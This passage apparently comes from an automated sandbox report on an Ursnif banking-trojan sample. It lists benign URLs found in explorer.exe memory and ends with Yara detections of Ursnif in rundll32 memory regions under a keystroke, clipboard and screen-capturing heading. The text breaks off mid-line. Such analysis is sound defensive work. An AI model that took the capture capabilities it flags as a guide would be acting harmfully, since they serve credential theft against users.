              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 3.3.rundll32.exe.58994a0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000003.831952409.0000000005899000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.917944713.0000000003698000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.818012728.0000000005918000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.817964029.0000000005918000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.872375871.0000000003698000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.872502118.0000000003698000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.872568970.0000000003698000.00000004.00000040.sdmp, type: MEMORY
              Source: